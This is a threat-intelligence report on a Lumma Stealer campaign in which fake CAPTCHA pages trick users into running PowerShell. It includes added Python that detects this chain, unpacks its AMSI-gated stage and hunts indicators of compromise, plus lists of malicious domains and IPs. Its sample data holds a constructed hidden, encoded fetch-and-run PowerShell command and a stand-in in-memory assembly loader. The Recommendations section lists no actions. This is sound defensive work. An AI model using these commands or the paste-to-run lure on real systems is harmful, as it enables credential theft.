Active Lumma Stealer Campaign Impacting U.S. SLTTs

By: The Center for Internet Security, Inc. (CIS®) Cyber Threat Intelligence (CTI) team

Published March 20, 2025


The CIS CTI team identified Lumma Stealer malware activity impacting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations. CIS analysts observed multiple detections through CIS Endpoint Security Services (ESS) in which SLTT victims were redirected to malicious webpages delivering a fake CAPTCHA verification prompt designed to trick users into running a PowerShell script. CIS ESS detected these fake CAPTCHA prompts because Mshta ran malicious JavaScript and because of the PowerShell script that the JavaScript then attempted to run. (Mshta is a Windows utility used to execute Microsoft HTML Application (HTA) files.)

Once the PowerShell script runs on the victim’s system, two additional PowerShell scripts are downloaded and run. A third PowerShell script, containing a defense evasion check and encrypted Windows binary code, is compiled on the infected system into the .NET Lumma Stealer payload.

The CIS CTI team recommends that U.S. SLTT government entities remain aware of Lumma Stealer and other information stealer campaigns since they are widespread, opportunistic, and known to target sensitive data.

Background Information on Lumma Stealer

Lumma Stealer is an infostealer written in C that emerged on dark web forums in 2022. The cyber threat actor “Shamel,” also known as “Lumma,” sells Lumma Stealer as a Malware-as-a-Service (MaaS) subscription with various tiers.[1] Once cyber threat actors (CTAs) purchase a subscription, the malware lets them harvest personally identifiable information (PII) from victims’ systems, such as credentials and banking information.

Depending on the tier CTAs purchase, the malware offers multiple defense evasion capabilities, including detecting virtualized environments, detecting user activity on the system, encrypting Lumma Stealer’s executable to deter reverse engineering, bypassing signature detection, and utilizing polyglot files.[2] Lumma Stealer additionally employs a variety of living-off-the-land techniques, specifically DLL sideloading, Mshta, PowerShell, process hollowing, SSH, and WMI.[3]

Two Incidents with Fake CAPTCHA Verifications

The current campaign uses malvertisement as an initial infection vector to deceive users into clicking malicious ads that lead to fake CAPTCHA verifications. CTAs use traffic distribution systems, content delivery networks, and compromised websites to spread malvertisements, which redirect end users to CTA-created webpages hosted on various providers.[4],[5] After the victim clicks the “I’m not a robot” button in the fake CAPTCHA verification (Figure 1), they encounter unusual verification steps, which include: 

  1. Press Windows button + R
  2. Press CTRL+V
  3. Press Enter 

Figure 1: Fake CAPTCHA verification steps. (Source: Qualys)

These steps execute a PowerShell command that leads to a Lumma Stealer download. The CIS CTI team analyzed two specific incidents associated with this activity based on CIS ESS detections, as described below.[6]
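The three verification steps above leave a recognizable process chain on the endpoint: the Run box (explorer.exe) launches mshta.exe or powershell.exe directly, and the pasted command typically carries a hidden window flag and a Base64 (UTF-16LE) encoded body that fetches the next stage. The following is an added example, not CIS or Lumma code, of triaging that chain in Python over process-creation telemetry. The field names (parent, image, cmdline) and all three sample events are constructed for the example and are not a real product's schema or real telemetry.

```python
"""Triage process-creation telemetry for the fake-CAPTCHA (Win+R paste) chain.

Added example; not CIS or Lumma code. The log schema (parent/image/cmdline)
and every sample event below are constructed for this example."""
import base64
import re

# Constructed stand-in for a stage-one command: fetch and evaluate a remote script.
_STAGE1 = "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"
_STAGE1_B64 = base64.b64encode(_STAGE1.encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta "javascript:a=1;close()"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -ep bypass -enc {_STAGE1_B64}"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...); its value
# is Base64 of a UTF-16LE string. -ep (ExecutionPolicy) is deliberately excluded.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:hidden|h)\b")
DOWNLOAD_CUE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                          r"invoke-restmethod|\birm\b|\biex\b|invoke-expression|https?://")
MSHTA_CUE = re.compile(r"(?i)javascript:|vbscript:|https?://")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """List the indicators one event carries; an empty list means nothing seen."""
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    reasons = []
    if image.endswith("mshta.exe") and MSHTA_CUE.search(cmd):
        reasons.append("mshta running inline script or a remote HTA")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        if HIDDEN_FLAG.search(cmd):
            reasons.append("hidden window")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
            if DOWNLOAD_CUE.search(decoded):
                reasons.append("decoded command fetches or evaluates remote content")
        elif DOWNLOAD_CUE.search(cmd):
            reasons.append("command fetches or evaluates remote content")
    if parent.endswith("mshta.exe"):
        reasons.append("spawned by mshta")
    if parent.endswith("explorer.exe") and image.endswith(("mshta.exe", "powershell.exe", "pwsh.exe")):
        reasons.append("launched directly from Explorer (Win+R / Run box)")
    return reasons


def triage(events, min_indicators=2):
    """Events carrying at least min_indicators indicators, as (index, reasons)."""
    out = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_indicators:
            out.append((i, reasons))
    return out


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["image"], "->", "; ".join(reasons))
```

The benign third event (an admin running a script from Explorer) scores only one weak indicator and is not surfaced; the two lure events score two and four. The explorer.exe parent is kept as a weak signal on purpose: on its own it is everyday activity, but combined with mshta or hidden, encoded PowerShell it is the footprint of a user pasting into the Run box.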

Incident One

In the first incident, the victim’s browser redirected to a fake CAPTCHA verification webpage housing obfuscated JavaScript as well as a Base64-encoded PowerShell script. CIS ESS detected the obfuscated JavaScript in the command line. Figure 2 shows the de-obfuscated script that ran in the command line.

Figure 2: De-obfuscated script that was run in the command line.

After the victim completed the verification steps, the encoded PowerShell script ran on their machine. Figure 3 shows that the decoded PowerShell script was hidden and attempted to download a file. CIS ESS blocked this activity. If not blocked, the downloaded file would have run an obfuscated and encoded PowerShell script, downloading the final Lumma Stealer payload.

Figure 3: Decoded PowerShell script is hidden and attempting to download a file.

Incident Two

As in the first incident, the victim in the second incident was redirected from a compromised or malicious webpage to a fake CAPTCHA verification page. CIS ESS again detected the obfuscated JavaScript in the command line, executed through Mshta; Figure 2 shows the de-obfuscated script. The PowerShell script, however, carried additional obfuscation, including strings wrapped in a further layer of Base64 encoding, as shown in Figure 4.

Figure 4: Base64-encoded PowerShell script.

As shown in Figure 5, the decoded PowerShell script included substantial amounts of junk code, but the end of the decoded script contained a PowerShell script that similarly attempted to download a file. Despite looking like a database file, Handler.db was another encoded PowerShell script.

Figure 5: Decoded PowerShell script.

This encoded PowerShell script was heavily obfuscated; however, CIS analysts found a PowerShell command in the first half of the script that checks whether the infected system’s AMSI provider would flag Mimikatz, that is, whether security software is actively scanning script content. See Figure 6.

Figure 6: Decoded PowerShell identifies whether the infected system will detect Mimikatz.

CIS analysts identified that the PowerShell script was encoded with decimal character codes and Base64. After decoding both layers, they determined the result was encrypted with an XOR cipher. CIS analysts then debugged the script and set a breakpoint immediately after the XOR key was assigned to a variable, as shown in Figure 7.

Figure 7: Debugged PowerShell script with breakpoint set after the XOR key was assigned to a variable.

CIS analysts used the debugger to read the value of the variable, which revealed the plaintext XOR key, AMSI_RESULTS_NOT_DETECTED, and used it to fully decrypt the PowerShell script. Notably, the key is never stored in the script: the string returned by the Mimikatz check (Figure 6) is always used as the decryption key. On a host where AMSI does not flag the test string, the result is AMSI_RESULTS_NOT_DETECTED and the rest of the script decrypts correctly. On a host where AMSI does flag it, the result is AMSI_RESULTS_DETECTED, the XOR runs with the wrong key, and the next stage never decrypts into runnable code, so the payload unpacks only on systems whose AMSI provider does not catch the Mimikatz test string. The decrypted PowerShell script contained another PowerShell script with a Base64-encoded string holding the Windows binary code for the final .NET Lumma Stealer payload, as shown in Figure 8.

Figure 8: Decoded PowerShell string shows Windows binary code, which when compiled is the .NET Lumma Stealer payload.

Once decoded, the PowerShell script compiles and executes the Lumma Stealer payload.
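The layered unpacking and the AMSI-result key described above can be reproduced offline. The following Python is an added example, not CIS's analysis script or the Lumma loader: it builds a blob in the layered form (XOR, then Base64, then decimal character codes; that layer order is an assumption, the page only names the layers), unpacks it with whichever AMSI result string a host would return, and shows a check that recovers the key without a debugger by trying the two known result strings. The stand-in stage text and the sample blob are constructed; the real inner stage is not reproduced.

```python
"""Layered decoding of the AMSI-gated PowerShell stage.

Added example; not CIS's script or Lumma code. The layer order (decimal
character codes -> Base64 -> XOR) and the stand-in stage text are assumptions."""
import base64
import re
from itertools import cycle

KEY_CLEAN = "AMSI_RESULTS_NOT_DETECTED"   # returned when AMSI does not flag the test string
KEY_FLAGGED = "AMSI_RESULTS_DETECTED"     # returned when it does
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def xor_bytes(data, key):
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ k for b, k in zip(data, cycle(key.encode())))


def pack_stage(plaintext, key):
    """Build a blob in the layered form: XOR, then Base64, then decimal codes."""
    b64 = base64.b64encode(xor_bytes(plaintext.encode(), key)).decode()
    return " ".join(str(ord(c)) for c in b64)


def unpack_stage(blob, key):
    """Reverse pack_stage: decimal codes -> Base64 text -> raw bytes -> XOR."""
    b64 = "".join(chr(int(n)) for n in re.findall(r"\d+", blob))
    return xor_bytes(base64.b64decode(b64), key)


def looks_like_powershell(data):
    """Cheap plausibility check: all printable ASCII plus a PowerShell-shaped token.

    Both candidate keys share the prefix AMSI_RESULTS_, so the first 13 bytes
    decrypt identically with either; the whole buffer must be checked."""
    if not all(b in PRINTABLE for b in data):
        return False
    return bool(re.search(r"(?i)\$\w+\s*=|Invoke-|New-Object|\[System\.", data.decode("ascii")))


def recover_key(blob, candidates=(KEY_CLEAN, KEY_FLAGGED)):
    """Without a debugger: try the known AMSI result strings as keys."""
    for key in candidates:
        if looks_like_powershell(unpack_stage(blob, key)):
            return key
    return None


def amsi_gate_decrypt(blob, amsi_flagged):
    """What the loader does: whatever string the AMSI check returned is the key."""
    return unpack_stage(blob, KEY_FLAGGED if amsi_flagged else KEY_CLEAN)


# Constructed stand-in for the inner stage (NOT the real loader): a script that
# would load a Base64 .NET assembly in memory. 'TVqQAA==' is only the 'MZ' header bytes.
STAGE_PLAINTEXT = ("$a=[System.Convert]::FromBase64String('TVqQAA==');"
                   "[System.Reflection.Assembly]::Load($a)")
BLOB = pack_stage(STAGE_PLAINTEXT, KEY_CLEAN)

if __name__ == "__main__":
    print("clean host   :", amsi_gate_decrypt(BLOB, amsi_flagged=False)[:40])
    print("flagged host :", amsi_gate_decrypt(BLOB, amsi_flagged=True)[:40])
    print("recovered key:", recover_key(BLOB))
```

The practical point for an analyst is in amsi_gate_decrypt: a sandbox or lab host with an AMSI provider that flags the Mimikatz test string will produce AMSI_RESULTS_DETECTED, decrypt garbage, and look like a dud sample. Either decrypt with the known result string as shown, or run the sample on a host where the check returns the clean value.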

Indicators of Compromise

Lumma Stealer frequently shifts its C2 infrastructure, so the domains and IP addresses listed below may not represent active infrastructure but can be used for retroactive threat hunting. The following IOCs are sourced from CIS CTI analysis and open-source research.[7], [8], [9], [10], [11]

C2 IPs

104[.]21[.]37[.]171
13[.]107[.]246[.]38
172[.]67[.]144[.]66
172[.]67[.]214[.]67
172[.]67[.]74[.]152
45[.]61[.]136[.]138
5[.]161[.]229[.]58
64[.]52[.]80[.]211

Domains 

absolutepicks[.]shop
addonclicks[.]com
adlndb2k9too7vt[.]cn
adlndb2k9too7vt[.]com
adlndb2k9too7vt[.]fun
adlndb2k9too7vt[.]top
adlndb2k9too7vt[.]xyz
adstrails[.]com
ajmaboxanherulv1[.]b-cdn[.]net
ajmaboxanherulv2[.]b-cdn[.]net
anti-automation-v2[.]b-cdn[.]net
anti-automation-v3[.]b-cdn[.]net
anti-automation-v4[.]b-cdn[.]net
anti-automation-v5[.]b-cdn[.]net
anti-automation-v6[.]b-cdn[.]net
apporholis[.]shop
arcivevaxue34[.]b-cdn[.]net
asping[.]klipnozenui[.]shop
bassizcellskz[.]shop
bettercart[.]shop
bhf[.]kliplygah[.]shop
bitc[.]kliplubuziy[.]shop
bmy7etxgksxo[.]objectstorage[.]ca-toronto-1[.]oci[.]customer-oci[.]com
bmy7etxgksxo[.]objectstorage[.]sa-santiago-1[.]oci[.]customer-oci[.]com
boltsreach[.]com
botcheck-encrypted-system[.]b-cdn[.]net
bot-check-v1[.]b-cdn[.]net
bot-check-v2[.]b-cdn[.]net
bot-systemexplorer[.]b-cdn[.]net
camplytic[.]com
cdn-downloads-now[.]xyz
celebratioopz[.]shop
ch3[.]dlvideosfre[.]click
charminammoc[.]cyou
check-cf-ver1[.]b-cdn[.]net
check-in-cf[.]b-cdn[.]net
chicmoments[.]shop
chipdonkeruz[.]shop
chromeupdates[.]com
clickzstreamer[.]com
cloud-checked[.]com
clovixo[.]com
complaintsipzzx[.]shop
crookedfoshe[.]bond
crowdwarek[.]shop
data-seed-prebsc-1-s1[.]bnbchain[.]org
dawnbloom[.]shop
dazzletouch[.]shop
deallerospfosu[.]shop
dedicloadpgeing[.]b-cdn[.]net
dedicloadpgeingv10[.]b-cdn[.]net
dedicloadpgeingv11[.]b-cdn[.]net
dedicloadpgeingv12[.]b-cdn[.]net
dedicloadpgeingv2[.]b-cdn[.]net
dedicloadpgeingv4[.]b-cdn[.]net
dedicloadpgeingv5[.]b-cdn[.]net
dedicloadpgeingv6[.]b-cdn[.]net
dedicloadpgeingv7[.]b-cdn[.]net
dedicloadpgeingv8[.]b-cdn[.]net
dedicloadpgeingv9[.]b-cdn[.]net
ebuymore[.]shop
echoicedeals[.]shop
editorcoms[.]com
encryption-code-verification[.]b-cdn[.]net
encryption-module-botverify[.]b-cdn[.]net
femalsabler[.]shop
fiare-activity[.]com
file-typ-botcheck[.]b-cdn[.]net
file-typ-botcheck-v1[.]b-cdn[.]net
findkik[.]com
fineclouding[.]com
fingerboarding[.]com
fixazo[.]online
foodrailway[.]cfd
freeofapps[.]com
full-fast-movie-downloader[.]b-cdn[.]net
futureddospzmvq[.]shop
gabrize[.]shop
gamebalri[.]com
gawanjaneto[.]com
getcodavbiz[.]com
get-verified[.]b-cdn[.]net
get-verified2[.]b-cdn[.]net
glidronix[.]com
godagichi[.]com
greetycruthsuo[.]shop
growthselec[.]bond
gustavu[.]shop
handscreamny[.]shop
hardcorelegends[.]com
helpmemoverand[.]com
hhhh[.]klipcewucyu[.]shop
human-check[.]b-cdn[.]net
human-verify02[.]b-cdn[.]net
ialphacore[.]shop
ibattleboost[.]shop
immolatechallen[.]bond
impressflow[.]com
insigelo[.]com
iplogger[.]co
itechtics[.]com
izmncdnboxuse01[.]b-cdn[.]net
izmncdnboxuse02[.]b-cdn[.]net
izmncdnboxuse03[.]b-cdn[.]net
izmncdnboxuse04[.]b-cdn[.]net
izmncdnboxuse05[.]b-cdn[.]net
izmncdnboxuse06[.]b-cdn[.]net
izmncdnboxuse07[.]b-cdn[.]net
jarry-deatile[.]bond
jarry-fixxer[.]bond
kev-tolstoi[.]com
kiddoloom[.]shop
klipderiq[.]shop
lalclenfjhkinbn[.]top
languagedscie[.]shop
latestgadet[.]com
linkspans[.]com
longingfluffyr[.]cyou
marimarbahamas[.]me
mediamanagerverif[.]com
mennyudosirso[.]shop
misha-lomonosov[.]com
myapt67[.]s3[.]amazonaws[.]com
mytecbiz[.]org
n[.]kliphirofey[.]shop
n2[.]aroundpayablequirk[.]shop
nettrilo[.]com
newverifyyourself-system[.]b-cdn[.]net
newverifyyourself-system1[.]b-cdn[.]net
nikutjyjgchr[.]b-cdn[.]net
nikutjyjgchrv21[.]b-cdn[.]net
nikutjyjgchrv22[.]b-cdn[.]net
nikutjyjgchrv23[.]b-cdn[.]net
nikutjyjgchrv24[.]b-cdn[.]net
nikutjyjgchrv25[.]b-cdn[.]net
nowuseemi[.]com
objectstorage[.]ap-mumbai-1[.]oraclecloud[.]com
objectstorage[.]sa-santiago-1[.]oraclecloud[.]com
offerzforu[.]com
offerztodayforu[.]com
pain-temper[.]bond
precious-valkyrie-cea580[.]netlify[.]app
privatemeld[.]com
privatox[.]com
provenhandshakecap[.]com
pub-7a0525921ff54f1193db83d7303c6ee8[.]r2[.]dev
purnimaali[.]com
qu[.]ax
quialitsuzoxm[.]shop
reachorax[.]com
regsigara[.]com
restoindia[.]me
robinsharez[.]shop
satisfiedweb[.]com
scrutinycheck[.]cash
searchmegood[.]com
secureporter[.]com
servinglane[.]com
sheenglathora[.]com
smartlinkoffer[.]com
solve[.]bogx[.]org
sos-at-vie-1[.]exo[.]io
sos-at-vie-2[.]exo[.]io
sos-bg-sof-1[.]exo[.]io
sos-ch-dk-2[.]exo[.]io
sos-ch-gva-2[.]exo[.]io
sos-ch-gva-2[.]sos-cdn[.]net
sos-de-fra-1[.]exo[.]io
soundtappysk[.]shop
spotconningo[.]com
sputinik-1985[.]com
startingdestine[.]com
steamcommunity[.]com
streamingsplays[.]com
streamingszone[.]com
stripedre-lot[.]bond
strivehelpeu[.]bond
styletrove[.]shop
system-update-botcheck[.]b-cdn[.]net
sys-update-botcheck[.]b-cdn[.]net
tagsflare[.]com
taketheright[.]com
techstalone[.]com
tibedowqmwo[.]shop
tracksvista[.]com
trailsift[.]com
travelwithandrew[.]xyz
tunneloid[.]com
upgraded-botcheck-encryption[.]b-cdn[.]net
vanshitref[.]com
verif[.]dlvideosfre[.]click
verification-module-v2[.]b-cdn[.]net
verification-module-v3[.]b-cdn[.]net
verification-module-v4[.]b-cdn[.]net
verification-module-v5[.]b-cdn[.]net
verification-module-v6[.]b-cdn[.]net
verification-module-v7[.]b-cdn[.]net
verification-module-v8[.]b-cdn[.]net
verification-module-v9[.]b-cdn[.]net
verifyyourself-newsystem[.]b-cdn[.]net
verifyyourself-system[.]b-cdn[.]net
versersleep[.]shop
verticbuzz[.]com
weoidnet01[.]b-cdn[.]net
weoidnet010[.]b-cdn[.]net
weoidnet011[.]b-cdn[.]net
weoidnet012[.]b-cdn[.]net
weoidnet013[.]b-cdn[.]net
weoidnet015[.]b-cdn[.]net
weoidnet02[.]b-cdn[.]net
weoidnet03[.]b-cdn[.]net
weoidnet04[.]b-cdn[.]net
weoidnet05[.]b-cdn[.]net
weoidnet06[.]b-cdn[.]net
weoidnet07[.]b-cdn[.]net
weoidnet08[.]b-cdn[.]net
weoidnet09[.]b-cdn[.]net
westreamdaily[.]com
writerospzm[.]shop
yourtruelover[.]com
ytgvjh65archi[.]b-cdn[.]net

SHA256 Hashes

c0f74200267a768eb6f8a392a708c9cede9062e0e9d4391040ae94b495450d0d
fa3a5323454f98a482f5a8f9c830a80a5126dedea1492e98cdddf6442b1f7ee5
fb62bd6898fd17736800c6e213d3cc2e1d3300fd2f436156e4c2e2761ee5d920
0f5616b1638210fe909c6f6ce54882e2184dc6cfb052dbef6181c1bcd6e7d544
020c9112268594827baa644e08736a80ba2188f9942b03bcbe84de04b4e88e73
2a5558eb96007a1cb012202300b8ba4219f428044b901ab90c196abe9493212c
3cd0bd0ff0f5938d9b98b5a2bed3330e40403079bc8a4f01480ced32a9866134
3203a5ec6a808fb1e0e54a1393b72a75a95ae9b8003fc2d0b8d2d41f45a1a437
380a43c20a6500fed2dbbc3ab7e5b72886f5f73b592eb5d1fdc402fdee494553
4abbd3dae6c4a8708541941b63f46eb5d1ec227c75e2e6ffb763dfad29ad2c6a
4a9833f04feea52c3d0475731ed3e512611dc8948297af320234e4a03dfb74ce
539946911ae4b8ba1df0683de99d1911980acb4321a83caeca945d8e8c9c20d5
6bbfc78bda5d24aac10a2e22fc9f01b149a3dff5df17bd93c7a645224270c724
6d753b02ed2861e677adf5ac7bade2deb85e461e084d957796e96567fb334591
730f07308ac60dd05e67623945793f3413e01006cea97f725ae7618881a76f2d
8d35f815d50d5a82ca2135821a44f2e1211fb78f66a39caf761586864d835bae
81e2bc219563706963183b86c6a22f3dd5448f82fe3a603f261b4282988d5075
819362da725ad20659c58d5caa51e3cdefc6fae693a16f9c5a1f7652eeca7f1e
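The list above mixes defanging styles ([.], [[.]], bare dots) and hash casing, which breaks naive matching. The following Python is an added example, not CIS tooling, that normalizes a block of IOCs in this format, classifies each as IP, domain or SHA256, and hunts them across DNS query logs and observed file hashes, matching subdomains of a listed domain as well as exact names. RAW_IOCS is a small subset copied from the list above with its original defanging; the DNS log lines and observed hashes are constructed for the example.

```python
"""Normalize the defanged IOC list and hunt it across DNS and hash telemetry.

Added example; not CIS tooling. RAW_IOCS is a subset of the list above, copied
with its mixed defanging styles; the DNS lines and observed hashes are constructed."""
import re

RAW_IOCS = """
104[.]21[.]37[.]171
bhf.kliplygah[.]shop
crookedfoshe[[.]]bond
ialphacore.shop
verif[.]dlvideosfre[.]click
steamcommunity[.]com
C0F74200267A768EB6F8A392A708C9CEDE9062E0E9D4391040AE94B495450D0D
"""

# Shared or legitimate infrastructure the malware abuses: a hit is context, not an alert.
LOW_CONFIDENCE = {"steamcommunity.com", "data-seed-prebsc-1-s1.bnbchain.org"}

DEFANG = re.compile(r"\[{1,2}\.\]{1,2}")          # [.] and [[.]]
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHA256 = re.compile(r"^[0-9a-f]{64}$")


def refang(ioc):
    """Undo the common defanging styles and lower-case the result."""
    s = DEFANG.sub(".", ioc.strip().lower()).replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s)


def load_iocs(text):
    """Split an IOC block into (ips, domains, sha256) sets of refanged values."""
    ips, domains, hashes = set(), set(), set()
    for line in text.splitlines():
        v = refang(line)
        if not v:
            continue
        if IPV4.match(v):
            ips.add(v)
        elif SHA256.match(v):
            hashes.add(v)
        else:
            domains.add(v)
    return ips, domains, hashes


def domain_match(query, domains):
    """Return the IOC that the query equals or is a subdomain of, else None."""
    labels = query.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):          # never match on the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def hunt_dns(lines, domains):
    """Match 'query=<name>' fields in log lines against the domain IOCs."""
    hits = []
    for line in lines:
        m = re.search(r"query=(\S+)", line)
        if not m:
            continue
        ioc = domain_match(m.group(1), domains)
        if ioc:
            hits.append({"host": line.split()[1], "query": m.group(1), "ioc": ioc,
                         "confidence": "low" if ioc in LOW_CONFIDENCE else "high"})
    return hits


def hunt_hashes(observed, hashes):
    """Case-insensitive SHA256 matching against the IOC hashes."""
    return sorted({h.lower() for h in observed if h.lower() in hashes})


DNS_LOG = [  # constructed
    "2025-03-18T14:02:11Z ws-0451 query=verif.dlvideosfre.click rcode=NOERROR",
    "2025-03-18T14:02:13Z ws-0451 query=cdn.crookedfoshe.bond rcode=NOERROR",
    "2025-03-18T14:05:40Z ws-0102 query=www.microsoft.com rcode=NOERROR",
    "2025-03-18T14:07:02Z ws-0451 query=steamcommunity.com rcode=NOERROR",
]

if __name__ == "__main__":
    ips, domains, hashes = load_iocs(RAW_IOCS)
    for hit in hunt_dns(DNS_LOG, domains):
        print(hit)
```

Two caveats when running this against the full list: several entries are shared services (b-cdn[.]net hosts, exo[.]io and Oracle object storage buckets, steamcommunity[.]com used as a dead-drop resolver, the bnbchain[.]org RPC endpoint), and the Cloudflare-range IPs (104.21.x.x, 172.67.x.x) front many unrelated sites. Treat those as pivots to be confirmed against the process-chain evidence, not as alerts on their own.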

MITRE ATT&CK Patterns Observed

The MITRE ATT&CK Patterns below are based on CIS analysis as well as open-source reporting on the current Lumma Stealer campaign and capabilities.[12], [13], [14], [15]

Resource Development

T1583.001 Acquire Infrastructure: Domains
T1583.008 Acquire Infrastructure: Malvertising
T1584.006 Compromise Infrastructure: Web Services
T1588.002 Obtain Capabilities: Tool
T1608.001 Stage Capabilities: Upload Malware
T1608.004 Stage Capabilities: Drive-by Target
T1608.005 Stage Capabilities: Link Target

Initial Access

T1189 Drive-by Compromise
T1190 Exploit Public-Facing Application
T1566.002 Phishing: Spearphishing Link
T1566.003 Phishing: Spearphishing via Service

Execution

T1047 Windows Management Instrumentation
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1106 Native API
T1204 User Execution

Persistence

T1547.001 Boot or Logon AutoStart Execution: Registry Run Keys/Startup Folder

Privilege Escalation

T1055.012 Process Injection: Process Hollowing
T1547.001 Boot or Logon AutoStart Execution: Registry Run Keys/Startup Folder

Defense Evasion

T1027.009 Obfuscated Files or Information: Embedded Payloads
T1027.010 Obfuscated Files or Information: Command Obfuscation
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
T1027.001 Obfuscated Files or Information: Binary Padding
T1027.002 Obfuscated Files or Information: Software Packing
T1036.008 Masquerading: Masquerade File Type
T1055 Process Injection
T1055.012 Process Injection: Process Hollowing
T1112 Modify Registry
T1140 Deobfuscate/Decode Files or Information
T1218.005 System Binary Proxy Execution: Mshta
T1218.011 System Binary Proxy Execution: Rundll32
T1564.003 Hide Artifacts: Hidden Window
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1656 Impersonation

Credential Access

T1056.001 Input Capture: Keylogging
T1539 Steal Web Session Cookie
T1552.001 Unsecured Credentials: Credentials in Files
T1555.003 Credential from Password Stores: Credentials from Web Browsers

Discovery

T1057 Process Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery
T1217 Browser Information Discovery
T1497 Virtualization/Sandbox Evasion
T1497.001 Virtualization/Sandbox Evasion: System Checks
T1518 Software Discovery
T1518.001 Software Discovery: Security Software Discovery

Collection

T1005 Data from Local System
T1056 Input Capture
T1113 Screen Capture
T1115 Clipboard Data
T1119 Automated Collection

Command and Control

T1071 Application Layer Protocol
T1071.001 Application Layer Protocol: Web Protocols
T1105 Ingress Tool Transfer
T1132.001 Data Encoding: Standard Encoding
T1568.002 Dynamic Resolution: Domain Generation Algorithms

Exfiltration

T1041 Exfiltration Over C2 Channel

Recommendations

The Multi-State Information Sharing and Analysis Center® (MS-ISAC®) recommends that you take the following actions to improve network defenses against malware like Lumma Stealer.


References 

[1] https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer  

[2] https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha#campaign-analysis  

[3] https://www.cisecurity.org/insights/blog/living-off-the-land-threats-looming-from-within  

[4] https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6  

[5] https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha#campaign-analysis  

[6] https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha#campaign-analysis  

[7] https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha  

[8] https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/Spreadsheet-for-samples-using-HeartCrypt.csv  

[9] https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt  

[10] https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-09-IOCs-for-Lumma-Stealer-from-typosquatted-domain.txt  

[11] https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6  

[12] https://seanthegeek.net/posts/compromized-store-spread-lumma-stealer-using-fake-captcha/  

[13] https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha#campaign-analysis  

[14] https://www.cybereason.com/blog/threat-analysis-rise-of-lummastealer  

[15] https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/